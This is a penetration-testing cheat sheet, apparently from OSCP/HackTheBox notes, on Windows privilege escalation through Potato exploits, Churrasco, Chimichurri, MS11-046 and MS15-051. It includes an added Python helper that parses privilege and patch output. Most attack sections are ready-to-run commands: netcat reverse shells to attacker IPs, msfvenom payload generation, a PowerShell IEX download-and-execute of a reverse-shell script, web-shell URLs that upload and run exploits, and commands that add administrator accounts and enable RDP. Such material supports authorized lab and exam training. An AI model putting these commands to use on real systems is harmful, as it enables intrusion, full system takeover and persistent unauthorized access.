# 4 Kernel Exploits

| Family        | Notes                 | Versions                                                                                            |
| ------------- | --------------------- | --------------------------------------------------------------------------------------------------- |
| Rogue Potato  | Latest Version        | SHOULD work on Windows 10                                                                           |
| Juicy Potato  | Upgrade of Rotten     | <p>Server 2008 R2 - No Hotfixes<br>Windows 7 Enterprise 6.1.7600</p><p>Patched in Latest Win-10</p> |
| Rotten Potato | Old                   | Year: 2016                                                                                          |
| Churrasco     | Non-Potato            |                                                                                                     |
| Chimichurri   | Non-Potato : MS10-059 |                                                                                                     |

## Basics

* <https://github.com/SecWiki/windows-kernel-exploits>
* [GitlabPotatoesWindowsPrivEsc](https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html)

## Required for Potato

```
> whoami
Local Service

> whoami /priv
SeImpersonatePrivilege ..Enabled
```
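The page checks two things by eye: `whoami /priv` for an enabled `SeImpersonatePrivilege` (here and in the Juicy Potato section) and, in the Churrasco and Chimichurri sections, `systeminfo` for the OS build and patch state. The Python below is an added example, not part of the original cheat sheet: it parses constructed sample output of both commands (the sample text and the `KB0000001`-style hotfix numbers are placeholders, not captured from a real host) and reports whether an impersonation privilege is present and enabled, plus OS name, build, architecture and hotfix list. The same parser serves a defender auditing which service accounts hold `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` (the latter is the other token privilege the JuicyPotato README names; it is not mentioned on this page).

```python
"""Triage helper for the precondition this page checks by eye: an impersonation
privilege on the current token (`whoami /priv`) plus the OS build and patch
state (`systeminfo`). Added example, not from the original cheat sheet; the
sample outputs below are constructed, not captured from a real host."""
import re

# Token privileges the Potato / churrasco family relies on. The page names
# SeImpersonatePrivilege; SeAssignPrimaryTokenPrivilege is the other token
# privilege the JuicyPotato README lists as sufficient.
IMPERSONATION_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed sample of `whoami /priv` for a service account (not real output).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Constructed sample of the `systeminfo` lines that matter here (no hotfixes).
SAMPLE_SYSTEMINFO_UNPATCHED = """\
Host Name:                 WEB01
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Ethernet Adapter
"""

# Constructed sample with hotfixes listed (KB numbers are placeholders).
SAMPLE_SYSTEMINFO_PATCHED = """\
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
"""

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")
KEY_VALUE = re.compile(r"^([^:\[]+):\s+(.*)$")   # "Key:   value" lines only
HOTFIX = re.compile(r"\[\d+\]:\s*(KB\d+)")        # "[01]: KB..." entries


def parse_whoami_priv(text):
    """Map privilege name -> 'Enabled'/'Disabled' from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def impersonation_privs(privs):
    """Return the impersonation-capable privileges the token holds and their state."""
    return {p: privs[p] for p in IMPERSONATION_PRIVS if p in privs}


def parse_systeminfo(text):
    """Pull OS name, build number, architecture and hotfix list out of `systeminfo`."""
    fields = {}
    for line in text.splitlines():
        m = KEY_VALUE.match(line.strip())
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    build = re.search(r"Build (\d+)", fields.get("OS Version", ""))
    return {
        "os": fields.get("OS Name", ""),
        "build": int(build.group(1)) if build else None,
        "arch": "x64" if "x64" in fields.get("System Type", "") else "x86",
        "hotfixes": HOTFIX.findall(text),
    }


def triage(whoami_text, systeminfo_text):
    """Combine both checks. 'impersonation' is True only when an impersonation
    privilege is present *and* Enabled, which is what the page's
    `..SeImpersonatePrivilege = JuicyPotato` shorthand means."""
    held = impersonation_privs(parse_whoami_priv(whoami_text))
    host = parse_systeminfo(systeminfo_text)
    host["impersonation"] = any(s == "Enabled" for s in held.values())
    host["impersonation_privs"] = held
    return host


if __name__ == "__main__":
    for label, info in (("unpatched", SAMPLE_SYSTEMINFO_UNPATCHED),
                        ("patched", SAMPLE_SYSTEMINFO_PATCHED)):
        r = triage(SAMPLE_WHOAMI_PRIV, info)
        print(f"{label}: {r['os']} build {r['build']} {r['arch']}, "
              f"hotfixes={r['hotfixes'] or 'none'}, "
              f"impersonation={r['impersonation']} {r['impersonation_privs']}")
```

Feed it the saved output of the two commands from each host; a disabled-but-present privilege is reported separately from an enabled one, since `whoami /priv` shows both and only the Enabled state matters for the check above.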

## Token Impersonations

Service accounts\
You can't log in with them, but you can escalate from them.

## Rogue Potato

* <https://github.com/antonioCoco/RoguePotato>
* <https://github.com/antonioCoco/RoguePotato/releases> (compiled)
* <https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/>

```
> RoguePotato.exe -r 10.x.x.x -l 9999 -e "C:\PrivEsc\reverse.exe"
> nc -nvlp 9999
```

## Juicy Potato \*\*BEST\*\*

* Token Impersonation
* <https://github.com/ohpe/juicy-potato>
* [http://ohpe.it/juicy-potato/CLSID](http://ohpe.it/juicy-potato/CLSID/) (or powershell script)
* <https://github.com/ivanitlearning/Juicy-Potato-x86/releases>

```
whoami /priv   ..SeImpersonatePrivilege = JuicyPotato
JuicyPotato.exe -l 5555 -p C:\PrivEsc\reverse.exe -t * -c GUID_CLSID
Juicy.Potato.x86.exe -l 5555 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t *
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

nc -nvlp 5555
whoami ..system
```

## Juicy Potato + Powershell

* Reverse Shell with Admin
* JuicyPotato launches an elevated PowerShell that downloads and runs the reverse-shell .ps1
* <https://ohpe.it/juicy-potato/>
* REF: ArcticHTB

```
> cp /opt/JuicyPotato.exe jp.exe
> cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 revshell.ps1
> vim revshell.ps1
Add this to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 7600

> sudo impacket-smbserver kali .

> copy \\10.10.14.34\kali\jp.exe .
> jp.exe -t * -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -l 9001 -a "-c IEX(new-object net.webclient).downloadstring('http://$IP:9090/revshell.ps1')" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

> nc -lvnp 7600
> whoami ..system!!
```

## Rotten Potato

Exploit from 2016\
Service accounts could get System tickets and impersonate them

## Churrasco

* REF: GrannyHTB GrandpaHTB
* <https://technet.microsoft.com/library/security/ms09-012>
* Token impersonation via churrasco, to escalate privileges to System. Developed by Cesar Cerrudo.
* Server 2003 allows Network Service and Local Service to impersonate 'System'.
* Patched by Microsoft in Windows 2012 (MS09-012).
* On newer systems Juicy Potato works fine; on older systems, token impersonation is abused via the churrasco exploit.
* If you have access to a box as `nt authority\network service` (e.g. you managed to upload an ASP.NET shell), you can easily elevate your privileges on the box.
* You can download the exploit [**here**](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6705.zip) and compile it yourself, or use the one shipped with `sqlninja` at `/usr/share/sqlninja/apps/churrasco.exe`.
* `sqlninja` uses it in cases where the `sa` password has been brute-forced.
* After uploading you can easily:

  * Elevate your privileges.
  * Create an Admin account.

  ```
  ------------------------
  Share from Kali/smb:

  locate churrasco.exe
  wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
  cp /usr/share/sqlninja/apps/churrasco.exe /tmp
  cp /usr/share/sqlninja/apps/nc.exe /tmp
  msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 LPORT=5555 -f exe > /tmp/venomshell.exe

  locate smbserver.py
  cd /usr/share/doc/python3-impacket/examples/
  sudo python3 smbserver.py share /tmp
  nc -nvlp 5555

  ------------------------
  Windows:

  whoami /priv    ..SeImpersonatePrivilege - Yes!
  systeminfo      ..Server 2003 - Yes!

  cd C:\Windows\Temp
  copy \\10.x.x.x\share\nc.exe .
  copy \\10.x.x.x\share\venomshell.exe .
  copy \\10.x.x.x\share\churrasco.exe .

  > \\10.x.x.x\share\churrasco.exe -d whoami
  > churrasco -d "net user /add <username> <password>"
  > churrasco -d "net localgroup administrators <username> /add"
  > churrasco -d "net localgroup \"Remote Desktop Users\" <username> /add"
  > churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"
  > churrasco -d "reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
  linux> rdesktop -u oscp -p oscp 10.x.x.x

  > churrasco.exe -d venomshell.exe
  > churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
  > \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
  ```

## Chimichurri

* MS10-059
* Found with [WindowsExploitSuggester](/07-win-privesc/win-enum.md#windows-exploit-suggester)
* Server 2008 R2 Datacenter 6.1.7600 N/A Build 7600 No Patch 64bit
* github/Re4son ..other blog:

```
cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd "windows-kernel-exploits/MS10-059: Chimichurri/Compiled"
cp Chimichurri.exe .
python -m SimpleHTTPServer 4444

cd C:\ColdFusion8\    ..or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!

----------
or:

cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555

cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!

----------
chimichurri.exe $MyIP 5555
nc -nvlp 5555
system!
```

## MS11-046 (AFD PrivEsc)

* The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input which allows local users to elevate privileges.
* ms11-046.exe on 6.1.7600 Build 7600 (32-bit only)
* <https://www.exploit-db.com/exploits/40564/>

```
https://github.com/abatchy17/WindowsExploits
https://github.com/abatchy17/WindowsExploits/blob/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe

smbserver.py share .
\\10.10.14.34\share\MS11-046.exe
whoami ..system!

https://github.com/rasta-mouse/Watson

or
Download from:
https://www.exploit-db.com/exploits/40564

Compile:
apt install mingw-w64  ..if not installed
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine, but powershell is:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
whoami ..system!
```

## MS15-051

* REF: [DrupalPhpVuln](/04-webapps/drupal.md#serialization-vulnerability-41564-php)

```
MS15-051 privesc
github/hfiref0x ..compiled Taihou64.exe (Firefox flagged it as a virus)
github/SecWiki ..MS15-051 ..compiled ..zipped ..download

cp ms15-051x64.exe .
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
system!

http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e 10.x.x.x 5555"
nc -nvlp 5555
system!

Bonus PrivEsc:
ms15-051x64.exe whoami   ..easy
```

## Send and Execute

* Execute files from UNC shares
* Ex: [DrupalPhpVuln](/04-webapps/drupal.md#serialization-vulnerability-41564-php)

```
impacket-smbserver share myfolder
http://10.x.x.x/ippsec.php?fexec=\\10.x.x.x\share\privesc.exe whoami
```

